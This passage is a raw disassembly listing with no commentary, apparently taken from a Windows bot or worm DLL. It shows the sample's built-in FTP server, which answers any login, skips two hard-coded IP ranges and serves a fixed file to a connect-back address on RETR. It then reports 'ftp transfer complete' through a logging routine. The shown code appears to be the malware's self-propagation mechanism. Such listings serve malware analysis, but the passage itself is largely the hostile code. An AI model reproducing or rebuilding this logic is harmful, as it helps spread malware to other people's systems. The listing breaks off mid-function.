sub_100059FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005A0B proc near ; CODE XREF: sub_100059EC+8�p
push ebp
mov ebp, esp
push offset sub_10005A1D ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10005A0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10005A1D()
sub_10005A1D proc near ; DATA XREF: sub_10005A0B+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D101
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10005A1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005A2D proc near ; DATA XREF: .data:1000E030�o
push ebp
mov ebp, esp
call sub_10005A3C
call sub_10005A4C
pop ebp
retn
sub_10005A2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005A3C proc near ; CODE XREF: sub_10005A2D+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D100
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_10005A3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005A4C proc near ; CODE XREF: sub_10005A2D+8�p
push ebp
mov ebp, esp
push offset sub_10005A5E ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10005A4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10005A5E()
sub_10005A5E proc near ; DATA XREF: sub_10005A4C+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D100
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_10005A5E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10005A70(char *cp,u_short hostshort)
sub_10005A70 proc near ; CODE XREF: sub_10005C3D+B05�p
name = sockaddr ptr -10h
cp = dword ptr 8
hostshort = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov dword_1002D10C, eax
mov [ebp+name.sa_family], 2
mov eax, [ebp+cp]
push eax ; cp
call ds:inet_addr ; inet_addr
mov dword ptr [ebp+name.sa_data+2], eax
mov cx, [ebp+hostshort]
push ecx ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
push 8 ; Size
push 0 ; Val
lea edx, [ebp+name.sa_data+6]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
mov ecx, dword_1002D10C
push ecx ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_10005AE2
mov edx, dword_1002D10C
push edx ; s
call ds:closesocket ; closesocket
xor al, al
jmp short loc_10005AE4
; ---------------------------------------------------------------------------
loc_10005AE2: ; CODE XREF: sub_10005A70+5F�j
mov al, 1
loc_10005AE4: ; CODE XREF: sub_10005A70+70�j
mov esp, ebp
pop ebp
retn
sub_10005A70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005AE8 proc near ; CODE XREF: sub_10005C3D+B16�p
var_518 = dword ptr -518h
NumberOfBytesRead= dword ptr -514h
FileName = byte ptr -510h
hObject = dword ptr -410h
Dst = byte ptr -40Ch
lDistanceToMove = dword ptr -0Ch
var_8 = dword ptr -8
len = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov [ebp+len], 400h
mov [ebp+NumberOfBytesRead], 0
push 100h ; Count
push offset ExistingFileName ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jnz short loc_10005B4E
xor al, al
jmp loc_10005C39
; ---------------------------------------------------------------------------
loc_10005B4E: ; CODE XREF: sub_10005AE8+5D�j
push 0 ; lpFileSizeHigh
mov edx, [ebp+hObject]
push edx ; hFile
call ds:GetFileSize ; GetFileSize
mov [ebp+var_8], eax
loc_10005B60: ; CODE XREF: sub_10005AE8+131�j
cmp [ebp+var_8], 0
jz loc_10005C1E
push 400h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+len]
cmp ecx, [ebp+var_8]
jbe short loc_10005B8E
mov edx, [ebp+var_8]
mov [ebp+len], edx
loc_10005B8E: ; CODE XREF: sub_10005AE8+9E�j
xor eax, eax
sub eax, [ebp+var_8]
mov [ebp+lDistanceToMove], eax
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
mov ecx, [ebp+lDistanceToMove]
push ecx ; lDistanceToMove
mov edx, [ebp+hObject]
push edx ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov ecx, [ebp+len]
push ecx ; nNumberOfBytesToRead
lea edx, [ebp+Dst]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:ReadFile ; ReadFile
push 0 ; flags
mov ecx, [ebp+len]
push ecx ; len
lea edx, [ebp+Dst]
push edx ; buf
mov eax, dword_1002D10C
push eax ; s
call ds:send ; send
mov [ebp+var_518], eax
cmp [ebp+var_518], 0FFFFFFFFh
jnz short loc_10005C0D
call ds:WSAGetLastError ; WSAGetLastError
cmp eax, 2733h
jz short loc_10005C03
jmp short loc_10005C1E
; ---------------------------------------------------------------------------
loc_10005C03: ; CODE XREF: sub_10005AE8+117�j
mov [ebp+var_518], 0
loc_10005C0D: ; CODE XREF: sub_10005AE8+10A�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_518]
mov [ebp+var_8], ecx
jmp loc_10005B60
; ---------------------------------------------------------------------------
loc_10005C1E: ; CODE XREF: sub_10005AE8+7C�j
; sub_10005AE8+119�j
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, dword_1002D10C
push eax ; s
call ds:closesocket ; closesocket
mov al, 1
loc_10005C39: ; CODE XREF: sub_10005AE8+61�j
mov esp, ebp
pop ebp
retn
sub_10005AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005C3D proc near ; DATA XREF: sub_10009C30+6D�o
var_5A4 = dword ptr -5A4h
var_5A0 = dword ptr -5A0h
var_59C = dword ptr -59Ch
var_598 = byte ptr -598h
var_594 = byte ptr -594h
var_574 = byte ptr -574h
var_55C = byte ptr -55Ch
var_530 = byte ptr -530h
var_510 = byte ptr -510h
var_4F8 = byte ptr -4F8h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
var_4C0 = dword ptr -4C0h
var_4BC = word ptr -4BCh
var_4BA = byte ptr -4BAh
var_4B8 = dword ptr -4B8h
var_4B4 = dword ptr -4B4h
var_4B0 = dword ptr -4B0h
var_4AC = dword ptr -4ACh
var_4A8 = word ptr -4A8h
var_4A6 = byte ptr -4A6h
var_4A4 = byte ptr -4A4h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = word ptr -46Ch
var_468 = byte ptr -468h
Str = byte ptr -454h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
buf = byte ptr -434h
var_41C = dword ptr -41Ch
argp = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
readfds = fd_set ptr -40Ch
netlong = sockaddr ptr -308h
optval = byte ptr -2F8h
fd = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
Str2 = byte ptr -2ECh
var_288 = byte ptr -288h
hostshort = word ptr -254h
Dest = byte ptr -250h
s = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = byte ptr -214h
name = sockaddr ptr -1B0h
var_1A0 = dword ptr -1A0h
addrlen = dword ptr -19Ch
cp = byte ptr -198h
var_188 = dword ptr -188h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = byte ptr -17Ch
var_178 = dword ptr -178h
var_174 = byte ptr -174h
Dst = byte ptr -170h
var_10C = byte ptr -10Ch
var_108 = byte ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
push esi
push edi
mov dword ptr [ebp+optval], 1
mov [ebp+argp], 1
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov [ebp+var_188], ecx
mov edx, [eax+4]
mov [ebp+var_184], edx
mov eax, [eax+8]
mov [ebp+var_180], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_1A0], ecx
mov edx, [ebp+var_1A0]
mov byte ptr [edx+6], 1
mov [ebp+var_104], 0
mov [ebp+readfds.fd_count], 0
mov ax, word ptr [ebp+var_184]
mov hostshort, ax
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
push 4 ; optlen
lea ecx, [ebp+optval]
push ecx ; optval
push 4 ; optname
push 0FFFFh ; level
mov edx, [ebp+s]
push edx ; s
call ds:setsockopt ; setsockopt
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
mov ecx, [ebp+s]
push ecx ; s
call ds:ioctlsocket ; ioctlsocket
mov [ebp+name.sa_family], 2
mov dword ptr [ebp+name.sa_data+2], 0
mov dx, hostshort
push edx ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
push 8 ; Size
push 0 ; Val
lea eax, [ebp+name.sa_data+6]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; namelen
lea ecx, [ebp+name]
push ecx ; name
mov edx, [ebp+s]
push edx ; s
call ds:bind ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_10005D67
push 1
mov eax, [ebp+var_188]
push eax
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_10005D67: ; CODE XREF: sub_10005C3D+10C�j
push 0Ah ; backlog
mov ecx, [ebp+s]
push ecx ; s
call ds:listen ; listen
loc_10005D76: ; CODE XREF: sub_10005C3D+1B8�j
mov [ebp+var_41C], 0
jmp short loc_10005D91
; ---------------------------------------------------------------------------
loc_10005D82: ; CODE XREF: sub_10005C3D:loc_10005DB6�j
mov edx, [ebp+var_41C]
add edx, 1
mov [ebp+var_41C], edx
loc_10005D91: ; CODE XREF: sub_10005C3D+143�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_104]
jnb short loc_10005DB8
mov ecx, [ebp+var_41C]
mov edx, [ebp+ecx*4+var_100]
cmp edx, [ebp+s]
jnz short loc_10005DB6
jmp short loc_10005DB8
; ---------------------------------------------------------------------------
loc_10005DB6: ; CODE XREF: sub_10005C3D+175�j
jmp short loc_10005D82
; ---------------------------------------------------------------------------
loc_10005DB8: ; CODE XREF: sub_10005C3D+160�j
; sub_10005C3D+177�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_104]
jnz short loc_10005DF1
cmp [ebp+var_104], 40h
jnb short loc_10005DF1
mov ecx, [ebp+var_41C]
mov edx, [ebp+s]
mov [ebp+ecx*4+var_100], edx
mov eax, [ebp+var_104]
add eax, 1
mov [ebp+var_104], eax
loc_10005DF1: ; CODE XREF: sub_10005C3D+187�j
; sub_10005C3D+190�j
xor ecx, ecx
test ecx, ecx
jnz loc_10005D76
mov edx, [ebp+s]
mov [ebp+var_178], edx
loc_10005E07: ; CODE XREF: sub_10005C3D:loc_10006868�j
mov eax, 1
test eax, eax
jz loc_1000686D
mov ecx, 41h
lea esi, [ebp+var_104]
lea edi, [ebp+readfds]
rep movsd
push 0 ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
mov edx, [ebp+var_178]
add edx, 1
push edx ; nfds
call ds:select ; select
cmp eax, 0FFFFFFFFh
jnz short loc_10005E65
push 1
mov eax, [ebp+var_188]
push eax
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_10005E65: ; CODE XREF: sub_10005C3D+20A�j
mov [ebp+fd], 0
jmp short loc_10005E80
; ---------------------------------------------------------------------------
loc_10005E71: ; CODE XREF: sub_10005C3D+33D�j
; sub_10005C3D+38C�j ...
mov ecx, [ebp+fd]
add ecx, 1
mov [ebp+fd], ecx
loc_10005E80: ; CODE XREF: sub_10005C3D+232�j
mov edx, [ebp+fd]
cmp edx, [ebp+var_178]
jg loc_10006868
push 64h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 64h ; Size
push 0 ; Val
lea ecx, [ebp+Str2]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
lea edx, [ebp+readfds]
push edx ; fd_set *
mov eax, [ebp+fd]
push eax ; fd
call __WSAFDIsSet ; __WSAFDIsSet
test eax, eax
jz loc_10006863
mov ecx, [ebp+fd]
cmp ecx, [ebp+s]
jnz loc_10006098
mov [ebp+addrlen], 10h
lea edx, [ebp+addrlen]
push edx ; addrlen
lea eax, [ebp+netlong]
push eax ; addr
mov ecx, [ebp+s]
push ecx ; s
call ds:accept ; accept
mov [ebp+var_410], eax
cmp [ebp+var_410], 0FFFFFFFFh
jz loc_10006093
mov ecx, 5
mov esi, offset a220WelcomeToFt ; "220 Welcome to FTPd\n"
lea edi, [ebp+buf]
rep movsd
movsb
mov edx, dword ptr [ebp+netlong.sa_data+2]
push edx ; netlong
call ds:ntohl ; ntohl
mov esi, eax
push offset cp ; "61.251.128.0"
call ds:inet_addr ; inet_addr
push eax ; netlong
call ds:ntohl ; ntohl
cmp esi, eax
jb short loc_10005F7F
mov eax, dword ptr [ebp+netlong.sa_data+2]
push eax ; netlong
call ds:ntohl ; ntohl
mov esi, eax
push offset a61_251_128_255 ; "61.251.128.255"
call ds:inet_addr ; inet_addr
push eax ; netlong
call ds:ntohl ; ntohl
cmp esi, eax
ja short loc_10005F7F
jmp loc_10005E71
; ---------------------------------------------------------------------------
loc_10005F7F: ; CODE XREF: sub_10005C3D+316�j
; sub_10005C3D+33B�j
mov ecx, dword ptr [ebp+netlong.sa_data+2]
push ecx ; netlong
call ds:ntohl ; ntohl
mov esi, eax
push offset a210_93_224_0 ; "210.93.224.0"
call ds:inet_addr ; inet_addr
push eax ; netlong
call ds:ntohl ; ntohl
cmp esi, eax
jb short loc_10005FCE
mov edx, dword ptr [ebp+netlong.sa_data+2]
push edx ; netlong
call ds:ntohl ; ntohl
mov esi, eax
push offset a210_93_224_255 ; "210.93.224.255"
call ds:inet_addr ; inet_addr
push eax ; netlong
call ds:ntohl ; ntohl
cmp esi, eax
ja short loc_10005FCE
jmp loc_10005E71
; ---------------------------------------------------------------------------
loc_10005FCE: ; CODE XREF: sub_10005C3D+365�j
; sub_10005C3D+38A�j ...
mov [ebp+var_438], 0
jmp short loc_10005FE9
; ---------------------------------------------------------------------------
loc_10005FDA: ; CODE XREF: sub_10005C3D:loc_1000600E�j
mov eax, [ebp+var_438]
add eax, 1
mov [ebp+var_438], eax
loc_10005FE9: ; CODE XREF: sub_10005C3D+39B�j
mov ecx, [ebp+var_438]
cmp ecx, [ebp+var_104]
jnb short loc_10006010
mov edx, [ebp+var_438]
mov eax, [ebp+edx*4+var_100]
cmp eax, [ebp+var_410]
jnz short loc_1000600E
jmp short loc_10006010
; ---------------------------------------------------------------------------
loc_1000600E: ; CODE XREF: sub_10005C3D+3CD�j
jmp short loc_10005FDA
; ---------------------------------------------------------------------------
loc_10006010: ; CODE XREF: sub_10005C3D+3B8�j
; sub_10005C3D+3CF�j
mov ecx, [ebp+var_438]
cmp ecx, [ebp+var_104]
jnz short loc_10006049
cmp [ebp+var_104], 40h
jnb short loc_10006049
mov edx, [ebp+var_438]
mov eax, [ebp+var_410]
mov [ebp+edx*4+var_100], eax
mov ecx, [ebp+var_104]
add ecx, 1
mov [ebp+var_104], ecx
loc_10006049: ; CODE XREF: sub_10005C3D+3DF�j
; sub_10005C3D+3E8�j
xor edx, edx
test edx, edx
jnz loc_10005FCE
mov eax, [ebp+var_410]
cmp eax, [ebp+var_178]
jle short loc_1000606D
mov ecx, [ebp+var_410]
mov [ebp+var_178], ecx
loc_1000606D: ; CODE XREF: sub_10005C3D+422�j
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+var_410]
push ecx ; s
call ds:send ; send
loc_10006093: ; CODE XREF: sub_10005C3D+2DA�j
jmp loc_10006863
; ---------------------------------------------------------------------------
loc_10006098: ; CODE XREF: sub_10005C3D+2A2�j
push 0 ; flags
push 64h ; len
lea edx, [ebp+Dst]
push edx ; buf
mov eax, [ebp+fd]
push eax ; s
call ds:recv ; recv
mov [ebp+var_2F0], eax
cmp [ebp+var_2F0], 0
jg loc_1000616F
loc_100060C3: ; CODE XREF: sub_10005C3D+51A�j
mov [ebp+var_43C], 0
jmp short loc_100060DE
; ---------------------------------------------------------------------------
loc_100060CF: ; CODE XREF: sub_10005C3D:loc_1000614E�j
mov ecx, [ebp+var_43C]
add ecx, 1
mov [ebp+var_43C], ecx
loc_100060DE: ; CODE XREF: sub_10005C3D+490�j
mov edx, [ebp+var_43C]
cmp edx, [ebp+var_104]
jnb short loc_10006153
mov eax, [ebp+var_43C]
mov ecx, [ebp+eax*4+var_100]
cmp ecx, [ebp+fd]
jnz short loc_1000614E
loc_10006101: ; CODE XREF: sub_10005C3D+4FE�j
mov edx, [ebp+var_104]
sub edx, 1
cmp [ebp+var_43C], edx
jnb short loc_1000613D
mov eax, [ebp+var_43C]
mov ecx, [ebp+var_43C]
mov edx, [ebp+ecx*4+var_FC]
mov [ebp+eax*4+var_100], edx
mov eax, [ebp+var_43C]
add eax, 1
mov [ebp+var_43C], eax
jmp short loc_10006101
; ---------------------------------------------------------------------------
loc_1000613D: ; CODE XREF: sub_10005C3D+4D3�j
mov ecx, [ebp+var_104]
sub ecx, 1
mov [ebp+var_104], ecx
jmp short loc_10006153
; ---------------------------------------------------------------------------
loc_1000614E: ; CODE XREF: sub_10005C3D+4C2�j
jmp loc_100060CF
; ---------------------------------------------------------------------------
loc_10006153: ; CODE XREF: sub_10005C3D+4AD�j
; sub_10005C3D+50F�j
xor edx, edx
test edx, edx
jnz loc_100060C3
mov eax, [ebp+fd]
push eax ; s
call ds:closesocket ; closesocket
jmp loc_10006863
; ---------------------------------------------------------------------------
loc_1000616F: ; CODE XREF: sub_10005C3D+480�j
lea ecx, [ebp+var_214]
push ecx
lea edx, [ebp+Str2]
push edx
push offset aSS_7 ; "%s %s"
lea eax, [ebp+Dst]
push eax ; Src
call ds:sscanf ; sscanf
add esp, 10h
lea ecx, [ebp+Str2]
push ecx ; Str2
push offset Str1 ; "USER"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_100061EA
mov ecx, 5
mov esi, offset a331PasswordReq ; "331 Password required\n"
lea edi, [ebp+Str]
rep movsd
movsw
movsb
push 0 ; flags
lea edx, [ebp+Str]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+Str]
push eax ; buf
mov ecx, [ebp+fd]
push ecx ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_100061EA: ; CODE XREF: sub_10005C3D+56B�j
lea edx, [ebp+Str2]
push edx ; Str2
push offset aPass ; "PASS"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000623F
mov ecx, 5
mov esi, offset a230UserLoggedI ; "230 User logged in\n"
lea edi, [ebp+var_468]
rep movsd
push 0 ; flags
lea eax, [ebp+var_468]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+var_468]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_1000623F: ; CODE XREF: sub_10005C3D+5C3�j
lea eax, [ebp+Str2]
push eax ; Str2
push offset aSyst ; "SYST"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_100062A7
mov ecx, dword_10011F34
mov [ebp+var_474], ecx
mov edx, dword_10011F38
mov [ebp+var_470], edx
mov ax, word_10011F3C
mov [ebp+var_46C], ax
push 0 ; flags
lea ecx, [ebp+var_474]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+var_474]
push edx ; buf
mov eax, [ebp+fd]
push eax ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_100062A7: ; CODE XREF: sub_10005C3D+618�j
lea ecx, [ebp+Str2]
push ecx ; Str2
push offset aRest ; "REST"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10006319
mov edx, dword_10011F48
mov [ebp+var_484], edx
mov eax, dword_10011F4C
mov [ebp+var_480], eax
mov ecx, dword_10011F50
mov [ebp+var_47C], ecx
mov edx, dword_10011F54
mov [ebp+var_478], edx
push 0 ; flags
lea eax, [ebp+var_484]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+var_484]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_10006319: ; CODE XREF: sub_10005C3D+680�j
lea eax, [ebp+Str2]
push eax ; Str2
push offset aPwd ; "PWD"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10006370
mov ecx, 7
mov esi, offset a257IsCurrentDi ; "257 \"/\" is current directory\n"
lea edi, [ebp+var_4A4]
rep movsd
movsw
push 0 ; flags
lea ecx, [ebp+var_4A4]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+var_4A4]
push edx ; buf
mov eax, [ebp+fd]
push eax ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_10006370: ; CODE XREF: sub_10005C3D+6F2�j
lea ecx, [ebp+Str2]
push ecx ; Str2
push offset aType ; "TYPE"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_10006417
lea edx, [ebp+var_214]
push edx ; Str2
push offset aA ; "A"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10006417
mov eax, dword_10011F88
mov [ebp+var_4B8], eax
mov ecx, dword_10011F8C
mov [ebp+var_4B4], ecx
mov edx, dword_10011F90
mov [ebp+var_4B0], edx
mov eax, dword_10011F94
mov [ebp+var_4AC], eax
mov cx, word_10011F98
mov [ebp+var_4A8], cx
mov dl, byte_10011F9A
mov [ebp+var_4A6], dl
push 0 ; flags
lea eax, [ebp+var_4B8]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+var_4B8]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_10006417: ; CODE XREF: sub_10005C3D+749�j
; sub_10005C3D+765�j
lea eax, [ebp+Str2]
push eax ; Str2
push offset aType_0 ; "TYPE"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_100064BE
lea ecx, [ebp+var_214]
push ecx ; Str2
push offset aI ; "I"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_100064BE
mov edx, dword_10011FA8
mov [ebp+var_4CC], edx
mov eax, dword_10011FAC
mov [ebp+var_4C8], eax
mov ecx, dword_10011FB0
mov [ebp+var_4C4], ecx
mov edx, dword_10011FB4
mov [ebp+var_4C0], edx
mov ax, word_10011FB8
mov [ebp+var_4BC], ax
mov cl, byte_10011FBA
mov [ebp+var_4BA], cl
push 0 ; flags
lea edx, [ebp+var_4CC]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+var_4CC]
push eax ; buf
mov ecx, [ebp+fd]
push ecx ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_100064BE: ; CODE XREF: sub_10005C3D+7F0�j
; sub_10005C3D+80C�j
lea edx, [ebp+Str2]
push edx ; Str2
push offset aPasv ; "PASV"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10006515
mov ecx, 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+var_4F8]
rep movsd
movsw
push 0 ; flags
lea eax, [ebp+var_4F8]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+var_4F8]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_10006515: ; CODE XREF: sub_10005C3D+897�j
lea eax, [ebp+Str2]
push eax ; Str2
push offset aList ; "LIST"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000656D
mov ecx, 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+var_510]
rep movsd
movsw
movsb
push 0 ; flags
lea ecx, [ebp+var_510]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+var_510]
push edx ; buf
mov eax, [ebp+fd]
push eax ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_1000656D: ; CODE XREF: sub_10005C3D+8EE�j
lea ecx, [ebp+Str2]
push ecx ; Str2
push offset aPort ; "PORT"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_100066B7
mov ecx, 7
mov esi, offset a200PortCommand ; "200 PORT command successful\n"
lea edi, [ebp+var_530]
rep movsd
movsb
lea edx, [ebp+var_288]
push edx
lea eax, [ebp+Dest]
push eax
lea ecx, [ebp+var_17C]
push ecx
lea edx, [ebp+var_174]
push edx
lea eax, [ebp+var_10C]
push eax
lea ecx, [ebp+var_108]
push ecx
push offset aS_0 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
lea edx, [ebp+Dst]
push edx ; Src
call ds:sscanf ; sscanf
add esp, 20h
lea eax, [ebp+Dest]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_218], eax
lea ecx, [ebp+var_288]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_414], eax
push 32h ; Size
push 0 ; Val
lea edx, [ebp+Dest]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+var_414]
push eax
mov ecx, [ebp+var_218]
push ecx
push offset aXX ; "%x%x\n"
push 32h ; Count
lea edx, [ebp+Dest]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push 10h ; Radix
push 0 ; EndPtr
lea eax, [ebp+Dest]
push eax ; Str
call ds:strtoul ; strtoul
add esp, 0Ch
mov dword ptr [ebp+hostshort], eax
lea ecx, [ebp+var_17C]
push ecx
lea edx, [ebp+var_174]
push edx
lea eax, [ebp+var_10C]
push eax
lea ecx, [ebp+var_108]
push ecx
push offset aS_S_S_S ; "%s.%s.%s.%s"
push 10h ; Count
lea edx, [ebp+cp]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
push 0 ; flags
lea eax, [ebp+var_530]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+var_530]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:send ; send
jmp loc_10006850
; ---------------------------------------------------------------------------
loc_100066B7: ; CODE XREF: sub_10005C3D+946�j
lea eax, [ebp+Str2]
push eax ; Str2
push offset aRetr ; "RETR"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_100067E3
mov ecx, 0Ah
mov esi, offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
lea edi, [ebp+var_55C]
rep movsd
movsb
mov ecx, 5
mov esi, offset a226TransferC_0 ; "226 Transfer complete\n"
lea edi, [ebp+var_574]
rep movsd
movsw
movsb
mov ecx, 8
mov esi, offset a425CanTOpenDat ; "425 Can't open data connection\n"
lea edi, [ebp+var_594]
rep movsd
push 0 ; flags
lea ecx, [ebp+var_55C]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+var_55C]
push edx ; buf
mov eax, [ebp+fd]
push eax ; s
call ds:send ; send
mov cx, [ebp+hostshort]
push ecx ; hostshort
lea edx, [ebp+cp]
push edx ; cp
call sub_10005A70
add esp, 8
and eax, 0FFh
test eax, eax
jz short loc_100067BB
call sub_10005AE8
and eax, 0FFh
test eax, eax
jz short loc_100067B9
push 0 ; flags
lea eax, [ebp+var_574]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+var_574]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:send ; send
mov eax, dword_1002D0EC
add eax, 1
mov dword_1002D0EC, eax
xor ecx, ecx
mov cl, byte_1002D0F5
test ecx, ecx
jz short loc_100067B9
lea edx, [ebp+cp]
push edx ; char
push offset aFtpTransferCom ; "ftp transfer complete to %s"
push offset dword_1002C7E8 ; int
call sub_10007303
add esp, 0Ch
loc_100067B9: ; CODE XREF: sub_10005C3D+B22�j
; sub_10005C3D+B61�j
jmp short loc_100067E1
; ---------------------------------------------------------------------------
loc_100067BB: ; CODE XREF: sub_10005C3D+B14�j
push 0 ; flags
lea eax, [ebp+var_594]
push eax ; Str
call strlen ; strlen
